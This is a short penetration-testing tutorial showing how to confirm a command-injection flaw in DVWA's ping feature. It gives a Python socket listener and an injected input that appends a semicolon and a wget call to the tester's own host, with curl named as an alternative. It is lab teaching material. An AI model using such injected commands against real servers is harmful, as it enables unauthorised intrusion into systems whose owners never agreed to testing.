Let's validate command-injection vulnerabilities with HTTP traffic:
- It is possible to validate a command injection vulnerability in a web application by executing commands that will force the backend system to interact with a web server that you own.
- The logs can be easily examined for evidence that the vulnerable server has interacted with it. Alternatively, a custom script can be written that will generate an ad hoc web service that can listen for external connections and print the requests received. The following is an example of a Python script that will do just that:
#!/usr/bin/python
import socket
httprecv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httprecv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
httprecv.bind(("0.0.0.0",8000))
httprecv.listen(2)
(client, ( ip,sock)) = httprecv.accept()
print "Received connection from : ", ip
data = client.recv(4096)
print str(data)
client.close()
httprecv.close()
- Once the script has been executed, we need to force the target server to interact with the listening service to confirm the command-injection vulnerability. The DVWA application has a ping utility that can be used to ping a provided IP address.
- The user input is directly passed to a system call and can be modified to execute arbitrary commands in the underlying operating system. We can append multiple commands using a semicolon followed by each subsequent command, as shown in the following screenshot:
- In the example provided, input was given to ping 127.0.0.1 and perform a wget request on http://172.16.69.133:8000. The wget request corresponds to the ad hoc listening Python service. After submitting the input, we can verify that the command was executed by referring to the output of the script, as follows:
- Here, we can see that a connection was received from the target web server and that the user agent used to access the web service was wget. The curl command is another alternative that could be used if wget is not installed.